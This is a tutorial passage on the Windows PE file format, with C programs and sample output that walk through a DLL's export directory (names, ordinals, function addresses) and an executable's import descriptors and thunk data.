The above program continues with what we are learning about the structure of a PE file. In file e.c, there are six functions, namely abc, pqr, xyz, aaa, bbb and ccc. These six functions are placed in a dll, but only five of them can be accessed by other code, as ccc is not exported. By default, code in a dll is not exposed to the outside world.

 

There are, as always, two ways of giving permission to access code present in the dll. The first approach is to tag the functions with the keyword __declspec along with the option dllexport. The first two functions abc and pqr are exported in this way.

 

The second alternative is to use a definitions (.def) file. A def file has a certain format, which is clearly seen in file e.def. It starts with the reserved word LIBRARY and then the library name. If the name of the library is changed to e1.dll, the linker names the dll e1.dll. Then the keyword EXPORTS is specified, followed by the list of functions that are exported, here xyz, aaa and bbb.

 

The exported functions of a dll can be called using the Win32 API. The API takes either the name of the function or its ordinal number. This number is given after an @ following the name of the function. Normally using an ordinal number is not advisable as it may vary from one version of the dll to the other.

 

The function xyz is given an ordinal number of 5, the function aaa an ordinal number of 7 and bbb 12. If the ordinal number is not specified, the system chooses a default, beginning with 1 and increasing sequentially.

 

The indentation is there for display purposes only; most def files indent the function name also.

 

The exported functions of a dll are listed in the exports section along with their locations in the dll.

 

The program given below displays the exports data in the file e.dll.

 

#include <windows.h>

#include <stdio.h>

#include <time.h>

void main()

{

int i;

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

hfile = CreateFile("e.dll",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("pmappedfile=%p\n",pmappedfile);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

PIMAGE_SECTION_HEADER psectionheader;

psectionheader = (PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

DWORD beginexportsrva,endexportsrva,diff,startoffile;

beginexportsrva = pimageoptionalheader->DataDirectory[0].VirtualAddress;

endexportsrva = beginexportsrva + pimageoptionalheader->DataDirectory[0].Size;

printf("beginexportsrva=%p Size=%x endexportsrva=%p\n",beginexportsrva,pimageoptionalheader->DataDirectory[0].Size,endexportsrva);

printf("Sec No Name     Virtual Address PointerToRawData VirtualSize\n");

for ( i=0; i < pimagefileheader->NumberOfSections; i++, psectionheader++ )

{

/* Name need not be zero terminated when all 8 bytes are used, hence the .8 */

printf("%d      %6.8s   %x            %x                 %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);

if ( (beginexportsrva >= psectionheader->VirtualAddress) && (endexportsrva <= (psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))

break;

}

diff = (INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);

printf("diff=%d %x\n",diff,diff);

PIMAGE_EXPORT_DIRECTORY pexportdirectory;

startoffile = (DWORD)pmappedfile;

pexportdirectory = (PIMAGE_EXPORT_DIRECTORY)(startoffile + beginexportsrva - diff);

printf("pexportdirectory=%p\n",pexportdirectory);

char *nameoffile;

nameoffile  = (PSTR)(pexportdirectory->Name - diff + startoffile);

printf("FileName:%s %x\n", nameoffile,nameoffile);

printf("Characteristics:%08X\n", pexportdirectory->Characteristics);

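time_t exportstamp = (time_t)pexportdirectory->TimeDateStamp; /* ctime needs a real time_t, which may be wider than the 32-bit field */

printf("TimeDateStamp:%08X %s",pexportdirectory->TimeDateStamp,ctime(&exportstamp));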

printf("Version Number:Major.Minor %u.%02u\n", pexportdirectory->MajorVersion,pexportdirectory->MinorVersion);

printf("Ordinal Numbers Starting From:%08X\n", pexportdirectory->Base);

printf("Number of functions:%08X\n", pexportdirectory->NumberOfFunctions);

printf("Number of Names:%08X\n", pexportdirectory->NumberOfNames);

printf("Address of functions array rva=%08x\n",pexportdirectory->AddressOfFunctions);

printf("Address of names array rva=%08x\n",pexportdirectory->AddressOfNames);

printf("Address of ordinals array rva=%08x\n",pexportdirectory->AddressOfNameOrdinals);

long *pfunctionsactual;

short *pordinalsactual;

pfunctionsactual = (long *)((int)pexportdirectory->AddressOfFunctions - diff + startoffile);

pordinalsactual  = (short *)((int)pexportdirectory->AddressOfNameOrdinals - diff + startoffile);

char **ppnamesactual;

ppnamesactual = (char  **)((int)pexportdirectory->AddressOfNames - diff + startoffile);

printf("\ni  Entry Pt  Ordn  Name\n");

for ( i=0; i < pexportdirectory->NumberOfFunctions; i++ )

{

DWORD startoffunctionsrva = pfunctionsactual[i];

DWORD j;

if ( startoffunctionsrva == 0 ) 

continue;  

printf("%d  %08X  %4u", i , startoffunctionsrva, i + pexportdirectory->Base );

for ( j=0; j < pexportdirectory->NumberOfNames; j++ )

if ( pordinalsactual[j] == i )

printf("  %s", ppnamesactual[j] - diff + startoffile);

if ( (startoffunctionsrva >= beginexportsrva) && (startoffunctionsrva < endexportsrva) )

printf(" (forwarder -> %s)", startoffunctionsrva - diff + startoffile );

printf("\n");

}

printf("Array of Address of Functions\n");

for ( i = 0 ; i < pexportdirectory->NumberOfFunctions; i++)

printf("%d %08X\n",i,pfunctionsactual[i]);

printf("Array of NameOrdinals\n");

for ( i = 0 ; i < pexportdirectory->NumberOfNames; i++)

printf("%d %08X\n",i,pordinalsactual[i]);

printf("Names of functions\n");

for ( i = 0 ; i < pexportdirectory->NumberOfNames; i++)

printf("%d %08X %s\n",i,ppnamesactual[i] - diff + startoffile , ppnamesactual[i] - diff + startoffile);

}

 

pmappedfile=00310000

beginexportsrva=00004710 Size=80 endexportsrva=00004790

Sec No Name     Virtual Address PointerToRawData VirtualSize

0       .text   1000            1000                 275e

1      .rdata   4000            4000                 790

diff=0 0

pexportdirectory=00424710

FileName:e.dll 424776

Characteristics:00000000

TimeDateStamp:3FEBF2B2 Fri Dec 26 14:04:58 2003

Version Number:Major.Minor 0.00

Ordinal Numbers Starting From:00000005

Number of functions:00000008

Number of Names:00000005

Address of functions array rva=00004738

Address of names array rva=00004758

Address of ordinals array rva=0000476c

 

i  Entry Pt  Ordn  Name

0  0000100A     5  xyz

1  00001000     6  abc

2  0000100F     7  aaa

3  00001005     8  pqr

7  00001014    12  bbb

Array of Address of Functions

0 0000100A

1 00001000

2 0000100F

3 00001005

4 00000000

5 00000000

6 00000000

7 00001014

Array of NameOrdinals

0 00000002

1 00000001

2 00000007

3 00000003

4 00000000

Names of functions

0 0042477C aaa

1 00424780 abc

2 00424784 bbb

3 00424788 pqr

4 0042478C xyz

 

The above program displays the exports data in the file e.dll. The initial part of the program remains the same as before. The functions CreateFile, CreateFileMapping and MapViewOfFile map the file e.dll into memory, at location 310000 in the first line of the output. The start of a PE file contains a DOS header that gives the location of the PE header. After the characters P,E,0,0 comes the Image File header which is followed by the Image Optional header. The optional header is followed by the section headers. These headers have been explained earlier on, except for the array at the end of the Optional header called the Data Directory. Each structure in it has two members, VirtualAddress and Size. The VirtualAddress member gives the memory location of a particular set of data, i.e. its RVA, and the Size member gives its size.

 

The first structure in the Data Directory stores details of the exports information whereas the second one describes the imports data. We will limit our learning to these two structures for the time being.

 

The first DataDirectory structure states that the exports data begins 0x4710 bytes from the start of the file as loaded in memory and that its size is 0x80 bytes. Thus in effect, the export data takes up only 128 bytes. Note that 4710 is an RVA, an offset from the start of the file as the loader places it in memory. Remember that the loader does not lay the file out in memory the way the map functions do. The file is broken up into sections and each section is loaded in memory at the place its section header specifies.

 

It is for this reason that we now need to find out which section stores the exports data. The only way is to iterate through the section headers and look for the section that contains the RVA 4710, the value stored in the variable beginexportsrva. At the same time, the section details are displayed again.

 

In the if statement we check if the variable beginexportsrva or the start of the exports rva is greater than or equal to the VirtualAddress field, i.e the start of the section in memory. The section also should be large enough to contain the export data. This is done by checking the end of the exports data which must be less than or equal to the VirtualAddress plus the size of the section.

 

The first section starts at an RVA of 0x1000 or 4096 bytes, as the file starts with the headers. Since the section alignment is 4096 bytes, each section starts at a multiple of 4096 irrespective of the size of the section data. The section called .rdata starts at rva 0x4000 and has a size of 0x790 bytes, therefore it ends at 0x4790. The end of the exports data, stored in endexportsrva, is also 0x4790, which is less than or equal to this value, so the exports data lies wholly inside .rdata.

 

Since the if statement results in true for the second section, the loop is terminated with the details of the second section being stored in the psectionheader variable.
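
The section search described above can be sketched on its own, without windows.h. This is only a minimal sketch: the structure section_info and the function find_section are names made up for the illustration, holding just the section header fields the check needs, and the table is filled with the two sections printed for e.dll.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for the fields of a section header used here. */
struct section_info {
    const char *name;
    uint32_t virtual_address;     /* rva where the section starts in memory */
    uint32_t virtual_size;        /* size of the section in memory */
    uint32_t pointer_to_raw_data; /* offset of the section in the file */
};

/* Return the index of the section that holds the rva range
   begin_rva..end_rva, or -1 if no section contains it. */
int find_section(const struct section_info *sections, size_t count,
                 uint32_t begin_rva, uint32_t end_rva)
{
    size_t i;
    for (i = 0; i < count; i++) {
        uint32_t start = sections[i].virtual_address;
        uint32_t end = start + sections[i].virtual_size;
        if (begin_rva >= start && end_rva <= end)
            return (int)i;
    }
    return -1;
}

/* The two sections printed for e.dll in the output. */
static const struct section_info edll_sections[] = {
    { ".text",  0x1000, 0x275e, 0x1000 },
    { ".rdata", 0x4000, 0x0790, 0x4000 },
};
```

Called with the range 0x4710 to 0x4790 it selects index 1, the .rdata section. Unlike the loop in the program, it reports -1 when no section matches instead of running past the last header.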

 

A variable called diff is computed as the VirtualAddress of this section minus its PointerToRawData. It is zero in the case of e.dll, but for dlls like kernel32.dll it has a different value, 0xc00, as there the exports data is found in the first section, which is loaded in memory at 0x1000 while its pointer to raw data has a value of 0x400.

 

Thus on disk, the section of kernel32 that holds the exports starts 0x400 bytes from the start of the file, but when the actual loader loads it, the section is placed at 0x1000. As we are using the map functions to read the file, which keep the layout of the file on disk, the value of diff must be subtracted from every rva to arrive at the right place in our mapping. The rvas are always with respect to the Virtual Address. Newer versions of the linker give the rva and the pointer to raw data the same value.
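
The arithmetic with diff can be written as a small helper. This is a minimal sketch, assuming the rva lies inside the section whose two fields are passed in. The name rva_to_file_offset is made up for the illustration, as is the sample rva 0x1234 mentioned after the code.

```c
#include <stdint.h>

/* Convert an rva to an offset in the file on disk (or in a plain mapping
   of it), given the VirtualAddress and PointerToRawData of its section. */
uint32_t rva_to_file_offset(uint32_t rva, uint32_t virtual_address,
                            uint32_t pointer_to_raw_data)
{
    uint32_t diff = virtual_address - pointer_to_raw_data;
    return rva - diff;
}
```

With the kernel32 values quoted above (section at 0x1000, raw data at 0x400) an rva of 0x1234 would map to file offset 0x634, while for e.dll, where diff is zero, the rva 0x4710 stays 0x4710.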

 

The variable startoffile is made equal to pmappedfile, which indicates the start of the file in memory. Then the actual start of the exports directory, pexportdirectory, is computed by adding the rva in beginexportsrva to startoffile and subtracting diff, which for e.dll is zero. In the output the exports data is at memory location 00424710. Note that this and the other pointers printed after the first line correspond to a mapping that starts at 420000 rather than at the 310000 printed for pmappedfile, so the first line appears to come from a different run. The address at which a file is mapped can change from run to run.

 

This data is laid out as an IMAGE_EXPORT_DIRECTORY structure, which makes it easy to display some of its members.

 

The first member displayed is the name of the dll, which is stored at memory location 424776. Then comes a field called Characteristics whose present value is zero. This is followed by the date time stamp, a 32-bit count of seconds since 1 January 1970. This value can be converted to a string using the function ctime. This is followed by the major and minor version numbers, which are also zero.
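
Since ctime prints local time, the string shown for a time stamp depends on the time zone of the machine. A minimal sketch of a conversion that does not depend on it is given below. The function name pe_timestamp_to_utc is made up for the illustration, and the value is first copied into a time_t because on many compilers time_t is wider than the 32-bit field.

```c
#include <stdint.h>
#include <time.h>

/* Break a PE TimeDateStamp into UTC calendar fields.
   Returns 1 on success and 0 if the C library cannot convert the value. */
int pe_timestamp_to_utc(uint32_t stamp, struct tm *out)
{
    time_t seconds = (time_t)stamp;   /* widen first; time_t is often 64-bit */
    struct tm *utc = gmtime(&seconds);
    if (utc == NULL)
        return 0;
    *out = *utc;
    return 1;
}
```

For the stamp 3FEBF2B2 of e.dll the UTC fields come to 26 December 2003, 08:34:58, which is five and a half hours behind the local time printed in the output.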

 

In the def file, the first function xyz is given an ordinal number 5, the function aaa an ordinal number of 7 and function bbb 12. The abc and pqr functions are not given any ordinal numbers.

 

Thus our ordinal number starting point is 5 and, as we have not given the abc function an ordinal number, it is given the value 6. The def file overrules everything and as the aaa function has the ordinal number 7, the pqr function is given the ordinal number 8 and finally bbb has 12.

 

Thus the def file decides the ordinal numbers and the functions that do not have ordinal numbers are given the ones in the middle. The Base member of the exports directory gives us the starting point of the ordinal numbers, in our case 5. The next two members, NumberOfFunctions and NumberOfNames, are normally the same.

 

The NumberOfFunctions member gives the number of entries in the array of function addresses, that is, the exported functions plus the empty gaps between their ordinal numbers. The NumberOfNames member gives the number of functions that are exported by name. If you look at the def file for e.dll, the last function bbb is given an ordinal number of 12 and the second last function pqr has an ordinal number of 8.

 

Thus the AddressOfFunctions array has to have 3 empty members to account for the ordinal numbers 9, 10 and 11 that have no functions. This array has as many members as the last ordinal number minus the ordinal base, plus one. Thus if we change the ordinal number of the last function bbb to 100, NumberOfFunctions will change to 96.
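
The count can be checked with a few lines of C. This is a sketch only: the function name function_table_entries is made up, and the ordinal lists passed to it are the numbers the output shows for e.dll (5, 6, 7, 8 and 12).

```c
#include <stddef.h>
#include <stdint.h>

/* Given the ordinal numbers of all exported functions, return how many
   entries the array of function addresses needs and store the ordinal base. */
uint32_t function_table_entries(const uint32_t *ordinals, size_t count,
                                uint32_t *base_out)
{
    uint32_t lowest, highest;
    size_t i;

    if (count == 0) {
        *base_out = 0;
        return 0;
    }
    lowest = highest = ordinals[0];
    for (i = 1; i < count; i++) {
        if (ordinals[i] < lowest)
            lowest = ordinals[i];
        if (ordinals[i] > highest)
            highest = ordinals[i];
    }
    *base_out = lowest;
    return highest - lowest + 1;   /* gaps in between still take a slot */
}
```

For the ordinals 5, 6, 7, 8 and 12 it gives a base of 5 and 8 entries. With 12 replaced by 100 it gives 96 entries.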

 

Each function that we export has three bits of information associated with it. The first is the rva of where the function starts in memory. Then its ordinal number and finally its name. Thus in the exports directory we have three arrays which store the above data.

 

These arrays are called AddressOfFunctions, AddressOfNameOrdinals and AddressOfNames. Although we have only five exported functions, the size of the AddressOfFunctions array is 32 bytes, since it has eight 4-byte members, three of which are zero to account for the empty slots 9, 10 and 11. These three arrays are stored back to back.

 

The first array, AddressOfFunctions, starts at 00004738, followed by the array of names at 00004758, which is 32 bytes away. The third array, AddressOfNameOrdinals, starts at 0000476c, which is 20 bytes further on, as the names array has only 5 members of 4 bytes each for the five functions exported by name. Thus the three array sizes are not equal.
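
The three rvas printed in the output can be reproduced from the sizes of the entries. The sketch below assumes what the output for e.dll shows, namely that the arrays follow the 40-byte export directory structure back to back in the order functions, names, ordinals. The file format itself does not require this placement, since each array is found through its own rva. The names export_layout and layout_exports are made up for the illustration.

```c
#include <stdint.h>

#define EXPORT_DIRECTORY_BYTES 40u  /* size of the export directory structure */

struct export_layout {
    uint32_t functions_rva;  /* AddressOfFunctions: 4 bytes per entry */
    uint32_t names_rva;      /* AddressOfNames: 4 bytes per entry */
    uint32_t ordinals_rva;   /* AddressOfNameOrdinals: 2 bytes per entry */
    uint32_t end_rva;        /* first byte after the three arrays */
};

/* Work out where the arrays sit if they are packed right after the directory. */
struct export_layout layout_exports(uint32_t directory_rva,
                                    uint32_t number_of_functions,
                                    uint32_t number_of_names)
{
    struct export_layout l;
    l.functions_rva = directory_rva + EXPORT_DIRECTORY_BYTES;
    l.names_rva = l.functions_rva + 4u * number_of_functions;
    l.ordinals_rva = l.names_rva + 4u * number_of_names;
    l.end_rva = l.ordinals_rva + 2u * number_of_names;
    return l;
}
```

For a directory at 4710 with 8 functions and 5 names this gives 4738, 4758 and 476c. The arrays end at 4776, which matches the location 424776 printed for the dll name.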

 

Now as always we want to convert these numbers to our memory space and thus we create three new variables by adding startoffile and subtracting diff. We now have to display the details of the exported functions stored in these three arrays. We use the member NumberOfFunctions to decide how long the loop iterates. We first check if the current entry of the AddressOfFunctions array is zero.

 

If yes, we know that no such function exists and thus go back to the start of the loop. Remember there are no functions for ordinal numbers 9, 10 and 11. These entries will have a value of zero. We display the address of the function and then the ordinal number. The loop variable i is added to the ordinal base to give us the ordinal number.

 

If this gets a little difficult, we have also displayed at the end of the program the contents of the three arrays. The size of the first array, which gives us the addresses of the functions, is decided by the last ordinal number minus the ordinal base plus one, which in our case works out to 12 - 5 + 1 or 8.

 

The missing ordinal numbers have a zero as the value. The first function has the ordinal number given by the member Base and the next function an ordinal number that is higher by 1. Now starts the complication. The Name Ordinals array is not ordered at all and contains the same number of members as the array of names.

 

So if we want to find the name of the function with ordinal number 6, the function abc, we know that as it is the second function, the value of i is 1. The loop variable is the ordinal number minus the ordinal base. We thus scan the Name Ordinals array for a member whose value is 1 and not 6.

 

The values in the Name Ordinals array are not the ordinal numbers but the ordinal numbers minus the ordinal base. The position of a value in the Name Ordinals array is also the position of the matching entry in the Names array. Thus the system first stores the names of the functions in memory and the addresses of these names in the Names array.

 

Then it fills up the Name Ordinals array with the ordinal numbers, less the ordinal base, corresponding to the names. Thus the first member of the Names array contains the address of aaa and the first member of the Name Ordinals array its ordinal number 7 - 5 or 2. The last member of the Names array stores the address of the name xyz and as its ordinal number is 5, the last member of the Name Ordinals array has a value of 5 - 5 i.e. 0.

 

The Address of Functions array is indexed on the ordinal number minus the ordinal base. As you may have noticed, the Names array is sorted on the name of the function. Thus we first read the address of the function, whose index into the array is the ordinal number minus the ordinal base. We then find the member of the Name Ordinals array with this value. The position of that member gives us the position of the address of the name in the Address of Names array.
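
The way the three arrays work together can be tried out with the values printed for e.dll. This is a sketch under stated assumptions: the arrays are typed in by hand rather than read from the file, the names array holds C strings instead of rvas, and the three function names are made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ORDINAL_BASE        5u
#define NUMBER_OF_FUNCTIONS 8u
#define NUMBER_OF_NAMES     5u

/* The three arrays as printed for e.dll. */
static const uint32_t address_of_functions[NUMBER_OF_FUNCTIONS] =
    { 0x100A, 0x1000, 0x100F, 0x1005, 0, 0, 0, 0x1014 };
static const char *const address_of_names[NUMBER_OF_NAMES] =
    { "aaa", "abc", "bbb", "pqr", "xyz" };
static const uint16_t address_of_name_ordinals[NUMBER_OF_NAMES] =
    { 2, 1, 7, 3, 0 };

/* Ordinal number -> rva of the function, 0 if nothing is exported there. */
uint32_t rva_by_ordinal(uint32_t ordinal)
{
    uint32_t index = ordinal - ORDINAL_BASE;
    if (ordinal < ORDINAL_BASE || index >= NUMBER_OF_FUNCTIONS)
        return 0;
    return address_of_functions[index];
}

/* Name -> rva of the function, 0 if the name is not exported. */
uint32_t rva_by_name(const char *name)
{
    size_t j;
    for (j = 0; j < NUMBER_OF_NAMES; j++)
        if (strcmp(address_of_names[j], name) == 0)
            return address_of_functions[address_of_name_ordinals[j]];
    return 0;
}

/* Index into the functions array -> name, NULL if it has no name. */
const char *name_by_index(uint32_t index)
{
    size_t j;
    for (j = 0; j < NUMBER_OF_NAMES; j++)
        if (address_of_name_ordinals[j] == index)
            return address_of_names[j];
    return NULL;
}
```

Looking up ordinal 6 or the name abc both lead to the rva 1000, and index 1 leads back to the name abc. The linear search over the names is kept for clarity. As the names are sorted, a binary search would also work.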

 

The Imports table.

 

d.c

#include <windows.h>

main()

{

MessageBox(0,"hi","bye",0);

MessageBox(0,"hi1","bye1",0);

GetDC(0);

ReleaseDC(0,0);

}

 

cl d.c user32.lib

 

Microsoft supplies plenty of dlls from which code can be used when writing a program. However, this code does not physically get added to the exe file. Instead, a list is maintained of all the dlls along with the functions used from them. This list is called the imports section.

 

In the above exe file d.exe, three functions are called from the dll user32.dll. Let us now display the import data stored in file d.exe.

 

b.cpp

#include <windows.h>

#include <stdio.h>

#include <time.h>

void main()

{

HANDLE hfile,hfile1;

int i;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("d.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

PIMAGE_SECTION_HEADER psectionheader;

psectionheader = (PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

DWORD importstartrva,importendrva;

importstartrva = pimageoptionalheader->DataDirectory[1].VirtualAddress;

importendrva = importstartrva + pimageoptionalheader->DataDirectory[1].Size;

printf("importstartrva=%x size=%x\n",importstartrva,pimageoptionalheader->DataDirectory[1].Size);

printf("Section No Name    Virtual Address PointerToRawData VirtualSize\n");

for ( i=0; i < pimagefileheader->NumberOfSections; i++, psectionheader++ )

{

/* Name need not be zero terminated when all 8 bytes are used, hence the .8 */

printf("%2d         %-7.8s   %x            %x              %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);

if ( (importstartrva  >= psectionheader->VirtualAddress) && (importstartrva < (psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))

break;

}

DWORD diff,startoffile;

diff = (INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);

PIMAGE_IMPORT_DESCRIPTOR pimportDescriptor;

startoffile = (DWORD)pmappedfile;

pimportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(startoffile + importstartrva - diff);

printf("psectionheader=%x pimportDescriptor=%x\n",psectionheader , pimportDescriptor);

while ( 1 )

{

if ( (pimportDescriptor->TimeDateStamp==0 ) && (pimportDescriptor->Name==0) )

break;

printf("Name of Dll:%s\n", pimportDescriptor->Name -diff + startoffile );

printf("Characteristics:%08X (Unbound IAT)\n",pimportDescriptor->Characteristics);

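time_t importstamp = (time_t)pimportDescriptor->TimeDateStamp; /* ctime needs a real time_t, which may be wider than the 32-bit field */

printf("TimeDateStamp:%08X %s",pimportDescriptor->TimeDateStamp,ctime(&importstamp));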

printf("ForwarderChain:%08X\n",pimportDescriptor->ForwarderChain);

printf("First thunk RVA:%08X\n",pimportDescriptor->FirstThunk);

PIMAGE_THUNK_DATA pthunkdata,pthunkdatafirst;

long *pFirstThunk;

pthunkdata = (PIMAGE_THUNK_DATA)pimportDescriptor->Characteristics;

pFirstThunk = (long *)pimportDescriptor->FirstThunk;

pthunkdatafirst = (PIMAGE_THUNK_DATA)pimportDescriptor->FirstThunk;

pthunkdatafirst = (PIMAGE_THUNK_DATA)((DWORD)pthunkdatafirst - diff + startoffile);

pthunkdata = (PIMAGE_THUNK_DATA)((DWORD)pthunkdata - diff + startoffile);

pFirstThunk = (long *)((DWORD)pFirstThunk - diff + startoffile);

if (!pimportDescriptor->Characteristics) /* test the rva itself: pthunkdata was rebased above and is never null */

return;

printf("  Ordn  Name\n");

while ( 1 )

{

if ( pthunkdata->u1.AddressOfData == 0 )

break;

if ( pthunkdata->u1.Ordinal & IMAGE_ORDINAL_FLAG )

{

printf( "  %4u", IMAGE_ORDINAL(pthunkdata->u1.Ordinal) );

}

else

{

PIMAGE_IMPORT_BY_NAME pimportbyname;

pimportbyname = pthunkdata->u1.AddressOfData;

pimportbyname = (PIMAGE_IMPORT_BY_NAME)((DWORD)pimportbyname - diff + startoffile);

printf("  %4u  %s Memory=%x Value=%x", pimportbyname->Hint, pimportbyname->Name,pFirstThunk,*pFirstThunk);

}

if ( pimportDescriptor->TimeDateStamp )

printf( " (Bound to: %08X)", pthunkdatafirst->u1.Function );

printf( "\n" );

pthunkdata++;

pFirstThunk++;

}

pimportDescriptor++;

printf("\n");

}

}

 

Output

importstartrva=4404 size=3c

Section No Name    Virtual Address PointerToRawData VirtualSize

 0         .text     1000            1000              280e

 1         .rdata    4000            4000              778

psectionheader=4201e8 pimportDescriptor=424404

Name of Dll:USER32.dll

Characteristics:000044D0 (Unbound IAT)

TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970

ForwarderChain:00000000

First thunk RVA:00004090

  Ordn  Name

   515  ReleaseDC Memory=424090 Value=44e0

   446  MessageBoxA Memory=424094 Value=44f4

   253  GetDC Memory=424098 Value=44ec

 

Name of Dll:KERNEL32.dll

Characteristics:00004440 (Unbound IAT)

TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970

ForwarderChain:00000000

First thunk RVA:00004000

  Ordn  Name

   413  HeapDestroy Memory=424000 Value=4654

   411  HeapCreate Memory=424004 Value=4662

   342  GetStringTypeW Memory=424008 Value=4758

   339  GetStringTypeA Memory=42400c Value=4746

   202  GetCommandLineA Memory=424010 Value=450e

 

The first half of the program remains almost the same as in the exports program. Here, the 2nd member of the Data Directory contains the rva and the size of the imports section. The rva in our case is 4404 and its size 3c bytes.

 

The start and end of the imports data are placed in the variables importstartrva and importendrva. The section that contains the imports data is the rdata section as before, and the diff and startoffile variables are initialized in the same manner as before. Nothing changes. Thus the import data starts at location 424404.

 

The import data is made up of a series of structures called the Import Descriptor structures. There is one structure for each dll from where the code is imported. Also, every C program imports code from kernel32.dll due to the startup code added by the compiler. As a result, there are two such structures back to back in our import area, one for user32 and the other for kernel32.

 

The end of the import area is denoted by an Import Descriptor structure that has all its members zeroed out. Thus a while loop is implemented which exits when the members are all zero. Here the name and Date Time stamp field are checked to be zero for exit.
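
The walk over the descriptors can be sketched without windows.h. The structure below copies the five 32-bit fields of the Import Descriptor, and the table holds the Characteristics and FirstThunk values printed for d.exe. The two name rvas are not shown in the output, so the values used for them are placeholders, and the names import_descriptor and count_imported_dlls are made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* The five 32-bit fields of an Import Descriptor, 20 bytes in all. */
struct import_descriptor {
    uint32_t characteristics;  /* rva of the thunk array giving the names */
    uint32_t time_date_stamp;
    uint32_t forwarder_chain;
    uint32_t name;             /* rva of the dll name */
    uint32_t first_thunk;      /* rva of the array the loader fills in */
};

/* Count the descriptors before the terminator, using the same exit test
   as the program: both TimeDateStamp and Name are zero. */
size_t count_imported_dlls(const struct import_descriptor *d)
{
    size_t n = 0;
    while (!(d[n].time_date_stamp == 0 && d[n].name == 0))
        n++;
    return n;
}

static const struct import_descriptor d_exe_imports[] = {
    { 0x44D0, 0, 0, 0x4502 /* placeholder */, 0x4090 },  /* USER32.dll */
    { 0x4440, 0, 0, 0x4700 /* placeholder */, 0x4000 },  /* KERNEL32.dll */
    { 0, 0, 0, 0, 0 },                                   /* terminator */
};
```

Two descriptors plus the empty one take 3 x 20 = 60 bytes, which is the size of 3c reported for the imports data of d.exe.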

 

The name of the dll is displayed first. However, it is an rva and hence startoffile is to be added and diff subtracted, like in the exports program. The Characteristics and FirstThunk fields are treated the same way: initially they are simply rvas, so the variables made from them are reset to actual memory locations. They point to what are called Image Thunk Data structures.

 

The Characteristics field that is not zero is printed along with the Date Time and the Forwarder Chain which is zero. The most crucial field is the field FirstThunk which is an rva having a value of 0x4090.

 

Now either of the fields Characteristics or FirstThunk points to a series of structures that give the names of the functions imported from this dll. The variable pthunkdata is initialized to Characteristics and pthunkdatafirst to FirstThunk. Then again, it could so happen that the field Characteristics is zero. If it is, the program returns at once.

 

Now to display the names of the functions called from one dll, the inner loop is brought in. The variable pthunkdata, which represents the Characteristics field, is nothing but a pointer to a series of Image Thunk Data structures. As with the structures representing dlls, an empty Thunk Data structure denotes the end of the functions called from this dll. Thus if the AddressOfData member is zero, the inner loop is terminated. The if statement, which checks whether the function is imported by ordinal number alone, is generally not true, therefore the hint and the name are displayed in the else block. The AddressOfData member points to an Image Import By Name structure. Since it is an rva, its actual value is computed and then two members are displayed: Hint, a suggested index into the names array of the dll, and Name, the name of the function. The variable pthunkdata is then incremented to point to the next structure. Once the inner while ends, the variable pimportDescriptor is incremented in the outer while to point to the next such structure.
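
The test made on each thunk, and the size of the structure it points to, can be sketched as follows. The flag value 0x80000000 is that of IMAGE_ORDINAL_FLAG for 32-bit files. The function names are made up for the illustration, and the thunk value 0x80000010 used after the code is a hypothetical import by ordinal, not one found in d.exe.

```c
#include <stdint.h>
#include <string.h>

#define ORDINAL_FLAG32 0x80000000u   /* top bit set: import by ordinal */

/* Non-zero if the 32-bit thunk imports by ordinal number only. */
int thunk_is_ordinal(uint32_t thunk)
{
    return (thunk & ORDINAL_FLAG32) != 0;
}

/* The ordinal number held in the low 16 bits of such a thunk. */
uint16_t thunk_ordinal(uint32_t thunk)
{
    return (uint16_t)(thunk & 0xFFFFu);
}

/* Bytes taken by one Image Import By Name entry: a 2-byte Hint, the name
   with its terminating zero, and a pad byte if needed to end on an even
   offset. */
uint32_t import_by_name_bytes(const char *name)
{
    uint32_t n = 2u + (uint32_t)strlen(name) + 1u;
    return n + (n & 1u);
}
```

The thunk 44e0 printed for ReleaseDC has the top bit clear, so it is the rva of a hint and name. That entry takes 12 bytes, which is why the next one, for GetDC, is found at 44ec and the one for MessageBoxA at 44f4. The hypothetical thunk 0x80000010 would instead mean ordinal number 16.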

 

